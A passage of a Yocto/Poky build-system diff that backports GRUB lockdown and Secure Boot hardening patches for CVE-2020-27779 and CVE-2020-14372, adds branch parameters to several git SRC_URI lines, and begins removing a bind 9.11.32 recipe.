(@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. ++ + @node blocklist + @subsection blocklist + +diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c +index 57b4e9a..7ebf32e 100644 +--- a/grub-core/mmap/mmap.c ++++ b/grub-core/mmap/mmap.c +@@ -20,6 +20,7 @@ + #include + #include + #include ++#include + #include + #include + #include +@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut; + + GRUB_MOD_INIT(mmap) + { +- cmd = grub_register_command ("badram", grub_cmd_badram, +- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), +- N_("Declare memory regions as faulty (badram).")); +- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem, +- N_("FROM[K|M|G] TO[K|M|G]"), +- N_("Remove any memory regions in specified range.")); ++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram, ++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), ++ N_("Declare memory regions as faulty (badram).")); ++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem, ++ N_("FROM[K|M|G] TO[K|M|G]"), ++ N_("Remove any memory regions in specified range.")); + + } + diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch new file mode 100644 index 0000000000..e33c96a05b --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch @@ -0,0 +1,105 @@ +From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 24 Feb 2021 09:00:05 +0100 +Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs + when locked down + +There are some more commands that should be restricted when the GRUB is +locked down. Following is the list of commands and reasons to restrict: + + * fakebios: creates BIOS-like structures for backward compatibility with + existing OSes. This should not be allowed when locked down. + + * loadbios: reads a BIOS dump from storage and loads it. This action + should not be allowed when locked down. + + * devicetree: loads a Device Tree blob and passes it to the OS. It replaces + any Device Tree provided by the firmware. This also should + not be allowed when locked down. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 3 +++ + grub-core/commands/efi/loadbios.c | 16 ++++++++-------- + grub-core/loader/arm/linux.c | 6 +++--- + grub-core/loader/efi/fdt.c | 4 ++-- + 4 files changed, 16 insertions(+), 13 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index a1aaee6..ccf1908 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux + kernel. Does not perform merging with any device tree supplied by firmware, + but rather replaces it completely. + @ref{GNU/Linux}. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. + @end deffn + + @node distrust +diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c +index d41d521..5c7725f 100644 +--- a/grub-core/commands/efi/loadbios.c ++++ b/grub-core/commands/efi/loadbios.c +@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios; + + GRUB_MOD_INIT(loadbios) + { +- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios, +- 0, N_("Create BIOS-like structures for" +- " backward compatibility with" +- " existing OS.")); +- +- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios, +- N_("BIOS_DUMP [INT10_DUMP]"), +- N_("Load BIOS dump.")); ++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios, ++ 0, N_("Create BIOS-like structures for" ++ " backward compatibility with" ++ " existing OS.")); ++ ++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios, ++ N_("BIOS_DUMP [INT10_DUMP]"), ++ N_("Load BIOS dump.")); + } + + GRUB_MOD_FINI(loadbios) +diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c +index d70c174..ed23dc7 100644 +--- a/grub-core/loader/arm/linux.c ++++ b/grub-core/loader/arm/linux.c +@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux) + 0, N_("Load Linux.")); + cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd, + 0, N_("Load initrd.")); +- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree, +- /* TRANSLATORS: DTB stands for device tree blob. */ +- 0, N_("Load DTB file.")); ++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, ++ /* TRANSLATORS: DTB stands for device tree blob. */ ++ 0, N_("Load DTB file.")); + my_mod = mod; + current_fdt = (const void *) grub_arm_firmware_get_boot_data (); + machine_type = grub_arm_firmware_get_machine_type (); +diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c +index ee9c559..003d07c 100644 +--- a/grub-core/loader/efi/fdt.c ++++ b/grub-core/loader/efi/fdt.c +@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree; + GRUB_MOD_INIT (fdt) + { + cmd_devicetree = +- grub_register_command ("devicetree", grub_cmd_devicetree, 0, +- N_("Load DTB file.")); ++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0, ++ N_("Load DTB file.")); + } + + GRUB_MOD_FINI (fdt) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch new file mode 100644 index 0000000000..f9a6a73ebc --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch @@ -0,0 +1,37 @@ +From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 24 Feb 2021 22:59:59 +0100 +Subject: [PATCH] commands/setpci: Restrict setpci command when locked down + +This command can set PCI devices register values, which makes it dangerous +in a locked down configuration. Restrict it so can't be used on this setup. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + grub-core/commands/setpci.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c +index d5bc97d..fa2ba7d 100644 +--- a/grub-core/commands/setpci.c ++++ b/grub-core/commands/setpci.c +@@ -329,10 +329,10 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(setpci) + { +- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0, +- N_("[-s POSITION] [-d DEVICE] [-v VAR] " +- "REGISTER[=VALUE[:MASK]]"), +- N_("Manipulate PCI devices."), options); ++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0, ++ N_("[-s POSITION] [-d DEVICE] [-v VAR] " ++ "REGISTER[=VALUE[:MASK]]"), ++ N_("Manipulate PCI devices."), options); + } + + GRUB_MOD_FINI(setpci) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch new file mode 100644 index 0000000000..a756f8d1cf --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch @@ -0,0 +1,35 @@ +From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 24 Feb 2021 12:59:29 +0100 +Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down + +The command can be used to get/set ATA disk parameters. Some of these can +be dangerous since change the disk behavior. Restrict it when locked down. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + grub-core/commands/hdparm.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c +index d3fa966..2e2319e 100644 +--- a/grub-core/commands/hdparm.c ++++ b/grub-core/commands/hdparm.c +@@ -436,9 +436,9 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(hdparm) + { +- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0, +- N_("[OPTIONS] DISK"), +- N_("Get/set ATA disk parameters."), options); ++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0, ++ N_("[OPTIONS] DISK"), ++ N_("Get/set ATA disk parameters."), options); + } + + GRUB_MOD_FINI(hdparm) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch new file mode 100644 index 0000000000..b52273ff50 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch @@ -0,0 +1,62 @@ +From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 24 Feb 2021 15:03:26 +0100 +Subject: [PATCH] gdb: Restrict GDB access when locked down + +The gdbstub* commands allow to start and control a GDB stub running on +local host that can be used to connect from a remote debugger. Restrict +this functionality when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + grub-core/gdb/gdb.c | 32 ++++++++++++++++++-------------- + 1 file changed, 18 insertions(+), 14 deletions(-) + +diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c +index 847a1e1..1818cb6 100644 +--- a/grub-core/gdb/gdb.c ++++ b/grub-core/gdb/gdb.c +@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break; + GRUB_MOD_INIT (gdb) + { + grub_gdb_idtinit (); +- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub, +- N_("PORT"), +- /* TRANSLATORS: GDB stub is a small part of +- GDB functionality running on local host +- which allows remote debugger to +- connect to it. */ +- N_("Start GDB stub on given port")); +- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break, +- /* TRANSLATORS: this refers to triggering +- a breakpoint so that the user will land +- into GDB. */ +- 0, N_("Break into GDB")); +- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop, +- 0, N_("Stop GDB stub")); ++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub, ++ N_("PORT"), ++ /* ++ * TRANSLATORS: GDB stub is a small part of ++ * GDB functionality running on local host ++ * which allows remote debugger to ++ * connect to it. ++ */ ++ N_("Start GDB stub on given port")); ++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break, ++ /* ++ * TRANSLATORS: this refers to triggering ++ * a breakpoint so that the user will land ++ * into GDB. ++ */ ++ 0, N_("Break into GDB")); ++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop, ++ 0, N_("Stop GDB stub")); + } + + GRUB_MOD_FINI (gdb) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch new file mode 100644 index 0000000000..474826ade5 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch @@ -0,0 +1,61 @@ +From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 24 Feb 2021 14:44:38 +0100 +Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when + locked down + +The shim_lock verifier validates the XNU kernels but no its extensions +and packages. Prevent these to be loaded when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + grub-core/loader/xnu.c | 31 +++++++++++++++++-------------- + 1 file changed, 17 insertions(+), 14 deletions(-) + +diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c +index 77d7060..07232d2 100644 +--- a/grub-core/loader/xnu.c ++++ b/grub-core/loader/xnu.c +@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu) + N_("Load XNU image.")); + cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64, + 0, N_("Load 64-bit XNU image.")); +- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0, +- N_("Load XNU extension package.")); +- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0, +- N_("Load XNU extension.")); +- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir, +- /* TRANSLATORS: OSBundleRequired is a +- variable name in xnu extensions +- manifests. It behaves mostly like +- GNU/Linux runlevels. +- */ +- N_("DIRECTORY [OSBundleRequired]"), +- /* TRANSLATORS: There are many extensions +- in extension directory. */ +- N_("Load XNU extension directory.")); ++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0, ++ N_("Load XNU extension package.")); ++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0, ++ N_("Load XNU extension.")); ++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir, ++ /* ++ * TRANSLATORS: OSBundleRequired is ++ * a variable name in xnu extensions ++ * manifests. It behaves mostly like ++ * GNU/Linux runlevels. ++ */ ++ N_("DIRECTORY [OSBundleRequired]"), ++ /* ++ * TRANSLATORS: There are many extensions ++ * in extension directory. ++ */ ++ N_("Load XNU extension directory.")); + cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0, + /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */ + N_("Load XNU ramdisk. " diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch new file mode 100644 index 0000000000..e5d372a2b1 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch @@ -0,0 +1,65 @@ +From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Sat, 7 Nov 2020 01:03:18 +0100 +Subject: [PATCH] docs: Document the cutmem command + +The command is not present in the docs/grub.texi user documentation. + +Reported-by: Daniel Kiper +Signed-off-by: Javier Martinez Canillas +Signed-off-by: Daniel Kiper +Reviewed-by: Javier Martinez Canillas + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/docs/grub.texi b/docs/grub.texi +index ccf1908..ae85f55 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help} + * cpuid:: Check for CPU features + * crc:: Compute or check CRC32 checksums + * cryptomount:: Mount a crypto device ++* cutmem:: Remove memory regions + * date:: Display or set current date and time + * devicetree:: Load a device tree blob + * distrust:: Remove a pubkey from trusted keys +@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++The command is similar to @command{cutmem} command. ++ + Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). + This prevents removing EFI memory regions to potentially subvert the + security mechanisms provided by the UEFI secure boot. +@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules + be used. + @end deffn + ++@node cutmem ++@subsection cutmem ++ ++@deffn Command cutmem from[K|M|G] to[K|M|G] ++Remove any memory regions in specified range. ++@end deffn ++ ++This command notifies the memory manager that specified regions of RAM ought to ++be filtered out. This remains in effect after a payload kernel has been loaded ++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels ++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot ++kernels in general. ++ ++The command is similar to @command{badram} command. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. + + @node date + @subsection date diff --git a/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch new file mode 100644 index 0000000000..504352b4e3 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch @@ -0,0 +1,107 @@ +From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001 +From: Matthew Garrett +Date: Mon, 13 Jan 2014 12:13:09 +0000 +Subject: Don't permit loading modules on UEFI secure boot + +Author: Colin Watson +Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch +Forwarded: no +Last-Update: 2013-12-25 + +Patch-Name: no-insmod-on-sb.patch + +Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch] + +Backport of a Debian (and Fedora) patch implementing a way to get secure boot status +for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport. +Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch + +Signed-off-by: Marta Rybczynska +--- + grub-core/kern/dl.c | 13 +++++++++++++ + grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++ + include/grub/efi/efi.h | 1 + + 3 files changed, 42 insertions(+) + +diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c +index 48eb5e7b6..074dfc3c6 100644 +--- a/grub-core/kern/dl.c ++++ b/grub-core/kern/dl.c +@@ -38,6 +38,10 @@ + #define GRUB_MODULES_MACHINE_READONLY + #endif + ++#ifdef GRUB_MACHINE_EFI ++#include ++#endif ++ + + + #pragma GCC diagnostic ignored "-Wcast-align" +@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename) + void *core = 0; + grub_dl_t mod = 0; + ++#ifdef GRUB_MACHINE_EFI ++ if (grub_efi_secure_boot ()) ++ { ++ grub_error (GRUB_ERR_ACCESS_DENIED, ++ "Secure Boot forbids loading module from %s", filename); ++ return 0; ++ } ++#endif ++ + grub_boot_time ("Loading module %s", filename); + + file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE); +diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c +index 6e1ceb905..96204e39b 100644 +--- a/grub-core/kern/efi/efi.c ++++ b/grub-core/kern/efi/efi.c +@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid, + return NULL; + } + ++grub_efi_boolean_t ++grub_efi_secure_boot (void) ++{ ++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID; ++ grub_size_t datasize; ++ char *secure_boot = NULL; ++ char *setup_mode = NULL; ++ grub_efi_boolean_t ret = 0; ++ ++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !secure_boot) ++ goto out; ++ ++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !setup_mode) ++ goto out; ++ ++ if (*secure_boot && !*setup_mode) ++ ret = 1; ++ ++ out: ++ grub_free (secure_boot); ++ grub_free (setup_mode); ++ return ret; ++} ++ + #pragma GCC diagnostic ignored "-Wcast-align" + + /* Search the mods section from the PE32/PE32+ image. This code uses +diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h +index e90e00dc4..a237952b3 100644 +--- a/include/grub/efi/efi.h ++++ b/include/grub/efi/efi.h +@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var, + const grub_efi_guid_t *guid, + void *data, + grub_size_t datasize); ++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void); + int + EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1, + const grub_efi_device_path_t *dp2); diff --git a/poky/meta/recipes-bsp/grub/grub2.inc b/poky/meta/recipes-bsp/grub/grub2.inc index 180e3752f8..db7c23a84a 100644 --- a/poky/meta/recipes-bsp/grub/grub2.inc +++ b/poky/meta/recipes-bsp/grub/grub2.inc @@ -31,6 +31,20 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \ file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \ file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \ file://determinism.patch \ + file://no-insmod-on-sb.patch \ + file://CVE-2020-14372_1.patch \ + file://CVE-2020-14372_2.patch \ + file://CVE-2020-14372_3.patch \ + file://CVE-2020-14372_4.patch \ + file://CVE-2020-14372_5.patch \ + file://CVE-2020-14372.patch \ + file://CVE-2020-27779.patch \ + file://CVE-2020-27779_2.patch \ + file://CVE-2020-27779_3.patch \ + file://CVE-2020-27779_4.patch \ + file://CVE-2020-27779_5.patch \ + file://CVE-2020-27779_6.patch \ + file://CVE-2020-27779_7.patch \ " SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934" SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea" diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch new file mode 100644 index 0000000000..47c7ec4170 --- /dev/null +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch @@ -0,0 +1,36 @@ +From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001 +From: Khem Raj +Date: Wed, 11 Nov 2020 22:58:55 -0800 +Subject: [PATCH] Fix cross compilation using autoconf detected AR + +currently its using 'ar' program from build host, which is not expected, +we need to respect AR passed in environment + +Upstream-Status: Pending + +Signed-off-by: Khem Raj +--- + configure.in | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/configure.in b/configure.in +index 4ddbe8b..b7c3c31 100644 +--- a/configure.in ++++ b/configure.in +@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog, + ]) + + dnl Checks for programs. ++m4_ifndef([AC_PROG_AR],[dnl ++ AN_MAKEVAR([AR], [AC_PROG_AR]) ++ AN_PROGRAM([ar], [AC_PROG_AR]) ++ AC_DEFUN([AC_PROG_AR], ++ [AC_CHECK_TOOL(AR, ar, :)]) ++]) ++AC_PROG_AR + AC_PROG_CC + AC_PROG_GCC_TRADITIONAL + dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE +-- +2.29.2 + diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb index 4129237c59..54c431eeb3 100644 --- a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb @@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \ file://lrzsz-check-locale.h.patch \ file://cve-2018-10195.patch \ file://include.patch \ + file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \ " SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4" diff --git a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb index d8910c0ff1..972d8de17d 100644 --- a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb +++ b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb @@ -9,7 +9,7 @@ require opensbi-payloads.inc inherit autotools-brokensep deploy SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862" -SRC_URI = "git://github.com/riscv/opensbi.git \ +SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \ file://0001-Makefile-Don-t-specify-mabi-or-march.patch \ " diff --git a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb index 613e3161fb..8234b86162 100644 --- a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb +++ b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb @@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1" LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c" SECTION = "libs" -SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https" +SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master" SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc index 198ed52c7c..a001190292 100644 --- a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc +++ b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc @@ -14,7 +14,7 @@ PE = "1" # repo during parse SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd" -SRC_URI = "git://git.denx.de/u-boot.git \ +SRC_URI = "git://git.denx.de/u-boot.git;branch=master \ file://remove-redundant-yyloc-global.patch \ file://CVE-2020-8432.patch \ file://CVE-2020-10648-1.patch \ diff --git a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb b/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb deleted file mode 100644 index 9feebe5ae2..0000000000 --- a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb +++ /dev/null @@ -1,141 +0,0 @@ -SUMMARY = "ISC Internet Domain Name Server" -HOMEPAGE = "https://www.isc.org/bind/" -DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system" -SECTION = "console/network" - -LICENSE = "ISC & BSD" -LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=b88e7ca5f21908e1b2720169f6807cf6" - -DEPENDS = "openssl libcap zlib" - -SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \ - file://conf.patch \ - file://named.service \ - file://bind9 \ - file://generate-rndc-key.sh \ - file://make-etc-initd-bind-stop-work.patch \ - file://init.d-add-support-for-read-only-rootfs.patch \ - file://bind-ensure-searching-for-json-headers-searches-sysr.patch \ - file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \ - file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \ - file://0001-avoid-start-failure-with-bind-user.patch \ - " - -SRC_URI[sha256sum] = "cbf8cb4b74dd1452d97c3a2a8c625ea346df8516b4b3508ef07443121a591342" - -UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" -# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4 -UPSTREAM_CHECK_REGEX = "(?P9.(11|16|20|24|28)(\.\d+)+(-P\d+)*)/" - -# BIND >= 9.11.2 need dhcpd >= 4.4.0, -# don't report it here since dhcpd is already recent enough. -CVE_CHECK_WHITELIST += "CVE-2019-6470" - -inherit autotools update-rc.d systemd useradd pkgconfig multilib_script multilib_header - -MULTILIB_SCRIPTS = "${PN}:${bindir}/bind9-config ${PN}:${bindir}/isc-config.sh" - -# PACKAGECONFIGs readline and libedit should NOT be set at same time -PACKAGECONFIG ?= "readline" -PACKAGECONFIG[httpstats] = "--with-libxml2=${STAGING_DIR_HOST}${prefix},--without-libxml2,libxml2" -PACKAGECONFIG[readline] = "--with-readline=-lreadline,,readline" -PACKAGECONFIG[libedit] = "--with-readline=-ledit,,libedit" -PACKAGECONFIG[urandom] = "--with-randomdev=/dev/urandom,--with-randomdev=/dev/random,," -PACKAGECONFIG[python3] = "--with-python=yes --with-python-install-dir=${PYTHON_SITEPACKAGES_DIR} , --without-python, python3-ply-native," - -ENABLE_IPV6 = "--enable-ipv6=${@bb.utils.contains('DISTRO_FEATURES', 'ipv6', 'yes', 'no', d)}" -EXTRA_OECONF = " ${ENABLE_IPV6} --with-libtool --enable-threads \ - --disable-devpoll --enable-epoll --with-gost=no \ - --with-gssapi=no --with-ecdsa=yes --with-eddsa=no \ - --with-lmdb=no \ - --sysconfdir=${sysconfdir}/bind \ - --with-openssl=${STAGING_DIR_HOST}${prefix} \ - " - -inherit ${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native distutils3-base', '', d)} - -# dhcp needs .la so keep them -REMOVE_LIBTOOL_LA = "0" - -USERADD_PACKAGES = "${PN}" -USERADD_PARAM_${PN} 